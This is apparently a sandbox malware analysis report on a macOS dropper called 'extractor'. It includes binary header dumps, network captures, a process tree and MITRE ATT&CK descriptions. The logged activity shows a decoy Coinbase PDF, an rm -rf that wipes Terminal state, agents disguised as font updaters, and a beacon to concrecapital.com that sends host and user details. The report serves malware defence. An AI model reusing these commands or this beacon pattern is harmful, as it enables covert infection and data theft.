dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'l\xcc\x072\x07\xb35s\xabp\xa0\xdehp\xdcp'

build_version_command aggregated: 1

Name

Value

platform

minos

721152

sdk

786688

ntools

Datas

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	14737
stacksize	0

dylib_command aggregated: 2

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1200.3.0

compatibility_version

1.0.0

Datas

/usr/lib/libc++.1.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1311.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

linkedit_data_command aggregated: 3

Name	Value
dataoff	442920
datasize	24

Name	Value
dataoff	442944
datasize	0

Name	Value
dataoff	444752
datasize	21888

Internal Symbols

__Z10strreversePcS_

__Z11ExecuteFilePc

__Z11GetUserNamev

__Z11GlobalAllocjj

__Z11startDaemonv

__Z15IsSafariFAExistv

__Z16SecureZeroMemoryPvm

__Z4itoaiPci

__Z5ShellPcS_

__Z6popen2PKcPiS1_

__Z6thExecPv

__Z7pclose2i

__Z8WriteLogPc

__ZZ4itoaiPciE3num

____chkstk_darwin

___bzero

___stack_chk_fail

___stack_chk_guard

__dyld_private

__mh_execute_header

_access

_atoi

_close

_data

_data2

_data3

_data4

_data5

_dup2

_execl

_exit

_fclose

_fopen

_fork

_free

_fwrite

_g_szUserName

_getenv

_kill

_main

_malloc

_mkdir

_open

_perror

_pipe

_read

_remove

_sleep

_snprintf

_strcat

_strcpy

_strlen

_strrchr

_time

_waitpid

_write

dyld_stub_binder

External Symbols

____chkstk_darwin

___bzero

___stack_chk_fail

_access

_atoi

_close

_dup2

_execl

_exit

_fclose

_fopen

_fork

_free

_fwrite

_getenv

_kill

_malloc

_mkdir

_open

_perror

_pipe

_read

_remove

_sleep

_snprintf

_strcat

_strcpy

_strlen

_strrchr

_time

_waitpid

_write

General Information for header 2
Endian:	<
Size:	32-bit
Architecture:	ARM64
Filetype:	execute
Nbr. of load commands:	18
Entry point:

segment_command_64 aggregated: 5

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x4000

fileoff

0x0

filesize

0x4000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100002C80	0xDF0	0x2C80	6.2202	0x2	0x0	0	0x80000400
__stubs	__TEXT	0x100003A70	0x174	0x3A70	3.6862	0x2	0x0	0	0x80000408
__stub_helper	__TEXT	0x100003BE4	0x18C	0x3BE4	3.6746	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x100003D70	0x208	0x3D70	5.0542	0x0	0x0	0	0x2
__unwind_info	__TEXT	0x100003F78	0x88	0x3F78	2.7781	0x2	0x0	0	0x0

Name

Value

segname

__DATA_CONST

vmaddr

0x100004000

vmsize

0x4000

fileoff

0x4000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x10

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA_CONST	0x100004000	0x18	0x4000	-0.0000	0x3	0x0	0	0x6

Name

Value

segname

__DATA

vmaddr

0x100008000

vmsize

0x64000

fileoff

0x8000

filesize

0x64000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__la_symbol_ptr	__DATA	0x100008000	0xF8	0x8000	2.3004	0x3	0x0	0	0x7
__data	__DATA	0x1000080F8	0x620E3	0x80F8	7.9624	0x3	0x0	0	0x0
__common	__DATA	0x10006A1DB	0x104	0x0	0.0000	0x0	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x10006C000
vmsize	0x8000
fileoff	0x6C000
filesize	0x5ED0
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	442368
rebase_size	8
bind_off	442376
bind_size	64
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	442440
lazy_bind_size	440
export_off	442880
export_size	32

symtab_command aggregated: 1

Name	Value
symoff	442936
nsyms	57
stroff	444112
strsize	632

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	22
iextdefsym	22
nextdefsym	1
iundefsym	23
nundefsym	34
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	443848
nindirectsyms	65
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'5\xde\xd7\x0f\x99X:T\xa11m\x1fhs\xdfY'

build_version_command aggregated: 1

Name

Value

platform

minos

721152

sdk

786688

ntools

Datas

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	14540
stacksize	0

dylib_command aggregated: 2

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1200.3.0

compatibility_version

1.0.0

Datas

/usr/lib/libc++.1.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1311.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

linkedit_data_command aggregated: 3

Name	Value
dataoff	442912
datasize	24

Name	Value
dataoff	442936
datasize	0

Name	Value
dataoff	444752
datasize	21888

Internal Symbols

__Z10strreversePcS_

__Z11ExecuteFilePc

__Z11GetUserNamev

__Z11GlobalAllocjj

__Z11startDaemonv

__Z15IsSafariFAExistv

__Z16SecureZeroMemoryPvm

__Z4itoaiPci

__Z5ShellPcS_

__Z6popen2PKcPiS1_

__Z6thExecPv

__Z7pclose2i

__Z8WriteLogPc

__ZZ4itoaiPciE3num

___chkstk_darwin

___stack_chk_fail

___stack_chk_guard

__dyld_private

__mh_execute_header

_access

_atoi

_bzero

_close

_data

_data2

_data3

_data4

_data5

_dup2

_execl

_exit

_fclose

_fopen

_fork

_free

_fwrite

_g_szUserName

_getenv

_kill

_main

_malloc

_mkdir

_open

_perror

_pipe

_read

_remove

_sleep

_snprintf

_strcat

_strcpy

_strlen

_strrchr

_time

_waitpid

_write

dyld_stub_binder

External Symbols

___stack_chk_fail

_access

_atoi

_bzero

_close

_dup2

_execl

_exit

_fclose

_fopen

_fork

_free

_fwrite

_getenv

_kill

_malloc

_mkdir

_open

_perror

_pipe

_read

_remove

_sleep

_snprintf

_strcat

_strcpy

_strlen

_strrchr

_time

_waitpid

_write

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 12:34:25.771799088 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:25.771842003 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:25.772105932 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:25.783437014 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:25.783453941 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.140419960 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.140734911 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.288233042 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.288273096 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.288808107 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.288949966 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.289230108 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.332864046 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.399652958 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.399741888 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:34:26.399846077 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.400019884 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.400113106 CEST	49483	443	192.168.0.52	64.44.102.6
Aug 18, 2022 12:34:26.400130033 CEST	443	49483	64.44.102.6	192.168.0.52
Aug 18, 2022 12:36:13.567575932 CEST	443	49482	17.253.57.211	192.168.0.52
Aug 18, 2022 12:36:13.567601919 CEST	443	49482	17.253.57.211	192.168.0.52
Aug 18, 2022 12:36:13.567898989 CEST	49482	443	192.168.0.52	17.253.57.211
Aug 18, 2022 12:36:13.567955017 CEST	49482	443	192.168.0.52	17.253.57.211
Aug 18, 2022 12:36:13.568097115 CEST	49482	443	192.168.0.52	17.253.57.211
Aug 18, 2022 12:36:13.568388939 CEST	49482	443	192.168.0.52	17.253.57.211
Aug 18, 2022 12:36:13.576956987 CEST	443	49482	17.253.57.211	192.168.0.52
Aug 18, 2022 12:36:13.576982021 CEST	443	49482	17.253.57.211	192.168.0.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 12:34:25.755146980 CEST	52067	53	192.168.0.52	8.8.8.8
Aug 18, 2022 12:34:25.769753933 CEST	53	52067	8.8.8.8	192.168.0.52
Aug 18, 2022 12:34:28.624675035 CEST	53	59212	8.8.8.8	192.168.0.52
Aug 18, 2022 12:34:28.624697924 CEST	53	61916	8.8.8.8	192.168.0.52
Aug 18, 2022 12:34:35.631336927 CEST	137	137	192.168.0.52	192.168.0.255
Aug 18, 2022 12:35:14.021058083 CEST	53	52558	8.8.8.8	192.168.0.52
Aug 18, 2022 12:35:15.696243048 CEST	137	137	192.168.0.52	192.168.0.255
Aug 18, 2022 12:35:56.969883919 CEST	137	137	192.168.0.52	192.168.0.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 18, 2022 12:34:25.755146980 CEST	192.168.0.52	8.8.8.8	0x6c93	Standard query (0)	concrecapital.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 18, 2022 12:34:25.769753933 CEST	8.8.8.8	192.168.0.52	0x6c93	No error (0)	concrecapital.com		64.44.102.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

concrecapital.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.52	49483	64.44.102.6	443

Timestamp	Direction	Data
2022-08-18 10:34:26 UTC	OUT	GET /drew.jpg?response+Drews-Mac-mini.local/drew/11.6.1/3.000000Gh/x86_64/484630818816/499963174912/ HTTP/1.1 Host: concrecapital.com User-Agent: Mozilla/5.0+(Macintosh;Intel+Mac+OS+X+11_2_1)+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept: / Content-Encoding: application/x-www-form-urlencoded; charset=UTF-8
2022-08-18 10:34:26 UTC	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Thu, 18 Aug 2022 10:34:26 GMT Connection: close Content-Length: 1245
2022-08-18 10:34:26 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil

System Behavior

Analysis Process: mono-sgen64 PID: 866, Parent PID: 824

General

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Library/Frameworks/Mono.framework/Versions/6.12.0/bin/mono-sgen64
Arguments:	n/a
File size:	4699168 bytes
MD5 hash:	98f65da8c6a62423d3f4cda359f06a87

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/sudo
Arguments:	/usr/bin/sudo -u drew /Users/drew/Desktop/extractor
File size:	1216576 bytes
MD5 hash:	f21c2a2dc106642f7c38801e121c8c86

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/sudo
Arguments:	n/a
File size:	1216576 bytes
MD5 hash:	f21c2a2dc106642f7c38801e121c8c86

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	/Users/drew/Desktop/extractor
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (open '/Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf' && rm -rf '/Users/drew/Library/Saved Application State/com.apple.Terminal.savedState') 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/open
Arguments:	open /Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf
File size:	292560 bytes
MD5 hash:	81d0c6fefba2004d451915c6fa861914

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/drew/Library/Saved Application State/com.apple.Terminal.savedState
File size:	105984 bytes
MD5 hash:	6cd9e187f33d60ce3cb05b12435f0673

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (tar zxvf '/Users/drew/Library/Fonts/safarifontsagent_' -C '/Users/drew/Library/Fonts') 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/tar
Arguments:	tar zxvf /Users/drew/Library/Fonts/safarifontsagent_ -C /Users/drew/Library/Fonts
File size:	214896 bytes
MD5 hash:	dbeb13c3b2ade21995470fde7650314a

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (tar zxvf '/Users/drew/Library/Fonts/fontsupdater_' -C '/Users/drew/Library/Fonts') 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/tar
Arguments:	tar zxvf /Users/drew/Library/Fonts/fontsupdater_ -C /Users/drew/Library/Fonts
File size:	214896 bytes
MD5 hash:	dbeb13c3b2ade21995470fde7650314a

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (pgrep -f safarifontsagent) 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/pgrep
Arguments:	pgrep -f safarifontsagent
File size:	141136 bytes
MD5 hash:	8c476a299c23f6971101e7bbd6462c3c

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (pgrep -f safarifontsagent) 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/pgrep
Arguments:	pgrep -f safarifontsagent
File size:	141136 bytes
MD5 hash:	8c476a299c23f6971101e7bbd6462c3c

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (open -a '/Users/drew/Library/Fonts/FinderFontsUpdater.app') 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/open
Arguments:	open -a /Users/drew/Library/Fonts/FinderFontsUpdater.app
File size:	292560 bytes
MD5 hash:	81d0c6fefba2004d451915c6fa861914

Start time:	12:34:25
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:25
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (pgrep -f safarifontsagent) 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:25
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:25
Start date:	18/08/2022
Path:	/usr/bin/pgrep
Arguments:	pgrep -f safarifontsagent
File size:	141136 bytes
MD5 hash:	8c476a299c23f6971101e7bbd6462c3c

Start time:	12:34:25
Start date:	18/08/2022
Path:	/Users/drew/Desktop/extractor
Arguments:	n/a
File size:	958160 bytes
MD5 hash:	f97fc3d0dd6b217a92df567ad8f3d555

Start time:	12:34:25
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	bash -c (killall Terminal) 2>&1
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:25
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:25
Start date:	18/08/2022
Path:	/usr/bin/killall
Arguments:	killall Terminal
File size:	122272 bytes
MD5 hash:	f3e64d320b9eed9c6dbd97435daddded

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	196720 bytes
MD5 hash:	395c4370ee6c31ff7061018e365ee7b9

Start time:	12:34:24
Start date:	18/08/2022
Path:	/System/Applications/Preview.app/Contents/MacOS/Preview
Arguments:	/System/Applications/Preview.app/Contents/MacOS/Preview
File size:	5291440 bytes
MD5 hash:	510c4010daefc87831ff8730ab2f5092

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	196720 bytes
MD5 hash:	395c4370ee6c31ff7061018e365ee7b9

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater
Arguments:	/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater
File size:	186240 bytes
MD5 hash:	fc5d8c6ccf10d0b900baa394d2ead97d

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater
Arguments:	n/a
File size:	186240 bytes
MD5 hash:	fc5d8c6ccf10d0b900baa394d2ead97d

Start time:	12:34:24
Start date:	18/08/2022
Path:	/Users/drew/Library/Fonts/safarifontsagent
Arguments:	/Users/drew/Library/Fonts/safarifontsagent
File size:	153424 bytes
MD5 hash:	ded8cac968d278aeb2889dc7552e46e1

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	120912 bytes
MD5 hash:	8356936fbf1eeb3548896b9206a685a0

Start time:	12:34:24
Start date:	18/08/2022
Path:	/bin/bash
Arguments:	sh -c sw_vers -productVersion
File size:	1296704 bytes
MD5 hash:	c1edb59ec6a40884fc3c4e201d31b1d5

Start time:	12:34:24
Start date:	18/08/2022
Path:	/usr/bin/sw_vers
Arguments:	sw_vers -productVersion
File size:	121408 bytes
MD5 hash:	7e6a3895092064bd002ecb1d4300b0db

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report extractor

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures
